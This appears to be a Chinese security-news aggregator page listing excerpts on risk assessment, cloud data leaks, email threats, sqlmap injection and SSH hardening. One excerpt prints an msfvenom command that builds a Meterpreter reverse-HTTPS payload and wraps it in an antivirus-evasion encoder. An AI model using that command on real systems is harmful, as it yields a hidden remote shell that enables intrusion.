记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

风险评估如何现效果

信息安全管理是以风险管理为核心的,预管理风险必须先知道风险,知道风险的最佳途径是进行风险评估。然而对很多企业来说这个看似非常成熟、或者不应该存在困难的风险评估,却总不能达到预期的效果。风险评估结论普遍存在的问题是:战略性风险肉眼凡胎也能看出一些端倪,战术性风险又不疼不痒。这样的结论对风险控制策略的设计是无足轻重的,甚至实际的风险控制措施并没有针对真实存在的风险,而仅仅因为那是一般性安全架构需要而已。实践表明造成风险评估效果不佳的主要原因有以下三点:一是评估工作的组织与机制不健全,一般来说企业信息安全管理部门是评估工作的发起部门,但由于人力专业性的限制使得评估在很多内控与业务部门进行时,不能有效开展;二是工作计划松散,这与第一点问题有关联,正是因为人力专业性的限制、评估组织与机制的欠缺才导致计划模糊,评估部门没有
发布时间:2017-09-18 23:25 | 阅读:97356 | 评论:0 | 标签:术有专攻 资产管理 风险评估

第三方云应用带来的数据风险

2017年5月,AWS S3存储桶数据仓库被爆,至少220万道琼斯公司客户信息半公开。该错误很简单:存储桶权限设置失当,让免费AWS账户都可以访问里面内容。这次泄露暴露出:安全设置中很低级的错误,都可轻易导致客户个人信息受损。此类粗心大意的代价,包含监管罚款、信誉受损和潜在的法律诉讼。或许你会认为在自己的照管之下不会发生这种事,但你的数据安全又有多少是真正在你掌控之中的呢?你知道你的数据都存储在哪里吗?很有可能你的公司采用数十上百家第三方SaaS应用来处理各种事务,从管理发展前景和客户,到帮助维护账户。这些应用省下了你的业务时间和金钱开销,但它们同时也将你的数据放到了他人手中。此类应用大多将数据存在云端,就是道琼斯数据泄露的那种数据仓库。你怎么能保证自己的数据没有明文存储,不会被意外公开呢?最大的数据安全错误多
发布时间:2017-08-11 10:55 | 阅读:96323 | 评论:0 | 标签:术有专攻 云应用 数据安全 第三方风险 风险评估

防范恶意邮件攻击的五项最佳实践

电子邮件是企业不可或缺的沟通工具,员工、经理、HR、财务、销售、法律顾问、客户、供应链等各方之间都需要邮件来传输重要文件。这就招致了一个问题:企业经常意识不到,他们每天用以承载重要信息的这些文件类型(如Word文档、Excel表格和PDF等标准格式),也是黑客们散播恶意软件的最常用的工具。 对于网络罪犯来说,用欺诈邮件或网络钓鱼,来诱骗人们打开一个貌似正常实则有毒的附件,就像喝水吃饭一样自然。 由于电子邮件代表一个开放的、可信的通道,恶意软件可以搭载任何文档来感染整个网络。企业经常需要采取适当的安全策略和有效的措施来防止公司的攻击。下面是Glasswall的副总裁西蒙·泰勒的5个建议的预防措施,来帮助企业阻止各种威胁并保持敏感数据免受恶意攻击的影响。 1. 对邮件附件做风险评估 通常来讲,企业需要考虑和评估
发布时间:2017-04-12 23:45 | 阅读:114057 | 评论:0 | 标签:术有专攻 邮件安全 风险评估

基于风险评估来做安全对企业意味着什么?

随着网络安全风险在数量和复杂度上的提升,公司企业需要从响应事件转变到发现事件以事先预防上来。发展出健壮的基于风险的安全方法,需要专注于支持企业为了能预防、检测并相应攻击而进行信息安全威胁优先级划分、理解用于攻击的技术、评估控制的能力。不了解这一点,企业便难以确定对特定威胁的暴露程度,不清楚自身网络事件响应计划是否是结构化并足以在事发时解决威胁的。保护你最敏感的信息高官们十分熟悉网络空间的巨大好处,以及互联网和今天不断增长的联网设备是如何极大增长创新、合作、效率、竞争力和客户承诺的。然而,不幸的是,这些高管中很多人都在风险与回报的评估上挣扎非常。当今时代,公司企业必须做的一件事是,确保具有标准安全措施。信息安全论坛(ISF)《良好实践标准》便是这方面指南的一个例子。该《标准》被许多跨国公司用作信息安全的主要参考。
发布时间:2016-07-01 22:30 | 阅读:84126 | 评论:0 | 标签:术有专攻 信息安全论坛 响应事件 风险评估 黑客主义

解惑烟草行业工控系统如何风险评估

上周五下午,威努特工控安全联合创始人 赵宇 先生,带来了一场关于“工控系统的风险评估”的技术讲座。此次近200注册报名的朋友,来自各大高校、国企、外企、测评中心、安全厂商、大型集成商以及大型IT科技企业、安全实验室等。烟草企业调研参照标准本次在线技术讲座是继上个月瀚思科技万晓川先生的“大数据安全”后的第二场讲座。从讲座后大家的反馈来看,大家都对此次讲座的内容感到满意,也对这种形式的内容和价值的传播都比较感兴趣和认可。有意思的是,通过事前和大家在微信群里交流,我们发现这种在线技术讲座的形式不只省下了大家前往会场的时间和精力,相比上次活动,越来越多人开始倾向于通过移动端更加方便高效的来“听讲”。本次会议内容主要是通过对工控系统资产的识别,从脆弱性到威胁再到常见攻击途径的分析,并在最后给出了对某一烟草企业工控系统风险
发布时间:2016-02-01 16:30 | 阅读:151029 | 评论:0 | 标签:动态 行业动态 在线技术讲座 安全牛 工控安全 风险评估

如何实施工控系统的风险评估? 本周五14点在线讲座直播

安全牛在线技术讲座第二期来了!不用担心下雪、雾霾、冻成狗,不用考虑堵车、单双号、找停车位,不用签到找座位、找电源、找网络。只需在自己的办公环境里,甚至是家里,在自己的计算机上,听直播讲座!本次讲座的内容为“如何实施工控系统的风险评估”,主讲人为威努特工控安全公司联合创始人 赵宇。 赵宇赵宇,东北大学模式识别与智能系统专业毕业。多年信息安全行业研发及营销工作经验,历任华为安全产品硬件研发工程师、产品经理,绿盟科技高级产品推广经理,奇虎360高级安全咨询经理等职。曾负责华为USG2000防火墙的硬件开发,华为安全产品海外市场营销,绿盟云安全产品上市推广,360企业安全产品技术咨询等工作。对信息安全软硬件技术知识有着深厚的积累,精通企业信息安全体系建设及解决方案。讲座内容简介:一、工控风险评估综述包括评估原因、原则与
发布时间:2016-01-25 16:45 | 阅读:145837 | 评论:0 | 标签:动态 行业动态 安全牛 工控 风险评估

第八届信息安全漏洞分析与风险评估大会在京召开

10月23日,第八届信息安全漏洞分析与风险评估大会(VARA2015)在北京召开。本次大会主题是“大数据时代的漏洞分析与风险评估技术”,会议由中国信息安全测评中心主办,北京交通大学承办,清华大学协办。来自政府部门、高等院校、研究机构、信息安全产业界及应用单位的800余名嘉宾参加了大会。中央网信办网络安全协调局胡啸副局长此次大会由中国信息安全测评中心李守鹏副主任主持,中国信息安全测评中心朱胜涛主任和北京交通大学校长宁滨分别致欢迎辞,中央网信办网络安全协调局胡啸副局长做了重要发言。中国工程院院士何德全、两院院士王越、中国工程院院士倪光南、费爱国,中国信息安全测评中心党委书记吴世忠出席本次大会,何院士和倪院士做了重要发言。国家发改委高技术产业司王娜处长进行了“促进大数据创新发展,强化大数据安全保障”的主题演讲。国家信
发布时间:2015-10-24 02:50 | 阅读:90396 | 评论:0 | 标签:动态 VARA 信息安全 漏洞分析 风险评估 漏洞

CS论坛|有效风险管理和利润率增长之间的关系

风险管理和利润率之间的关系不只是相关关系,确切地说,是因果关系。做好风险管理,可以实现更好的利润增长。人人都知道IT部门是成本中心,但很多人不知道的是,认识和利用安全风险缓解和利润之间的联系可以创造利润率增长。根据全球会计公司普华永道2015年4月的最新调查报告《风险调查:解码不确定性风险》显示,73%的受访高管认为风险在上升,只有12%的人算得上是成功的风险管理领导者。报告显示,在最近的三年时间里,这12%当中有41%的年利润增长率超过10%。由此可见,风险管理不只是降低风险,还可以放大净利润。那么,风险和利润之间是什么样的关系呢?企业应该如何利用信息安全风险管理来提高利润率的增长呢?风险管理和利润率增长的关系信息安全风险会通过影响企业的声誉、股价以及有效运作能力来影响企业的利润率,优秀的风险管理者和管理方法
发布时间:2015-06-10 15:00 | 阅读:77845 | 评论:0 | 标签:牛观点 安全管理 风险评估

【CS论坛】安全风险评估的3种错误方式

即使计算机安全防御专家也难以区分真正的威胁和假警报。这里列出应该避免的3种关键却又普遍的错误。计算机安全人员在防御这件事上是出了名的不成功。原因很多,不仅仅是因为他们要承担所有的责任却又没有足够的权限。用户总是义无反顾地无视他们收到的好建议,甚至努力绕过安全控制。但是,在当今这混乱的计算机安全状况下,责备他人的行为总是再容易不过。考察一下修复程序,修补崩溃系统的第一步就是要承担你自己的责任。在我看来,计算机安全最大的问题之一就是防御者不能正确地评估风险。他们将太多较低的风险列为了高风险,而太多的高风险又被认为是不需要关注的。有3个原因可以解释为什么计算机安全防御者总是做出错误的判定。总的来说,这几点解释了为什么大多数公司把大部分IT预算花在了根本不能使他们免于受到侵害的项目上。1. 混淆了媒体炒作和真正的风险当
发布时间:2015-05-04 09:25 | 阅读:88389 | 评论:0 | 标签:牛观点 信息安全管理 风险评估

Burp Suite Article

Burp Suite 1: Introduction http://kyrionhackingtutorials.com/2012/05/burp-suite-1-introduction-2/ Burp Suite 2: Proxy | Intruder http://kyrionhackingtutorials.com/2012/05/burp-suite-2-proxy-intruder/ Burp Suite 3: Remotely Interception http://kyrionhackingtutorials.com/2012/05/burp-suite-3-remotely-interception/ Burp Suite 4: Repeater http://k
发布时间:2013-01-07 21:24 | 阅读:117383 | 评论:0 | 标签:burpsuite Burp Suite DDoS攻击 代码审计 内网安全 反病毒 社会工程学 网络安全 网络技术 风险

Sqlmap POST型注入

这里举例的是一个登录点存在post型注入 常用的注入工具测试都木有成功 用火狐的Tamper Data插件修改提交 可以看到报错信息 确定注入是存在的 这里用sqlmap测试注入 首先抓包(如burpsuite)获取提交的参数信息保存为post-sql.txt -r 加载这个post request文件 -p 指定可测试的参数 相关: sqlmap使用笔记 http://blog.bug.cx/2012/06/15/sqlmap%e4%bd%bf%e7%94%a8%e7%ac%94%e8%ae%b0/   Related posts: Sqlmap plugin for BurpSuite 如何使用SQLMap绕过WAF sqlmap使用笔记 Related posts: Sqlmap plugin

Antivirus Sandbox Evasion-ultimate-payload.pl

http://funoverip.net/2012/02/antivirus-sandbox-evasion-part1/ $ ./msfvenom -p windows/meterpreter/reverse_https -f raw LHOST=172.16.1.1 LPORT=443 | ./ultimate-payload.pl -t ultimate-payload-template1.exe -o /tmp/payload.exe [*ultimate] Waiting for payload from STDIN [*ultimate] Payload: read (size: 367) [*ultimate] Payload: encode (new size: 1161) [*ul
发布时间:2013-01-07 21:24 | 阅读:117048 | 评论:0 | 标签:metasploit DDoS攻击 msfencode msfpayload 代码审计 内网安全 反病毒 社会工程学

msf the pentest userguide 读书笔记 v2.pdf

http://forum.90sec.org/thread-3381-1-1.html msf_the_pentest_userguide_读书笔记_v2.pdf下载:msf_the_pentest_userguide_读书笔记_v2 作者写得不错  可以多看看 Related posts: Antivirus Sandbox Evasion-ultimate-payload.pl 黑客攻防实验环境部署.pdf 安全防御体系的构建.pdf Related posts: Antivirus Sandbox Evasion-ultimate-payload.pl 黑客攻防实验环境部署.pdf 安全防御体系的构建.pdf

VPS常用安全设置

http://www.2cto.com/Article/201208/147987.html 新手及才接触VPS的朋友们看一下,主要是关于VPS安全方面相关内容的: 一、修改SSH端口 vi /etc/ssh/sshd_config 找到其中的#Port 22(第13行),去掉#,修改成Port 3333 使用如下命令,重启SSH服务,注:以后用新端口登陆。 service sshd restart 二、禁止ROOT登陆 先添加一个新帐号80st ,可以自定义: useradd 80st 给weidao 帐号设置密码: passwd 80st 仍旧是修改/etc/ssh/sshd_config文件,第39行:#PermitRootLogin yes,去掉前面的#,并把yes改成no,然后,重启SSH服务。以后,

高级SSH安全技巧.pdf

高级SSH安全技巧.pdf下载:高级SSH安全技巧 Related posts: msf the pentest userguide 读书笔记 v2.pdf Antivirus Sandbox Evasion-ultimate-payload.pl VPS常用安全设置 Related posts: msf the pentest userguide 读书笔记 v2.pdf Antivirus Sandbox Evasion-ultimate-payload.pl VPS常用安全设置

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词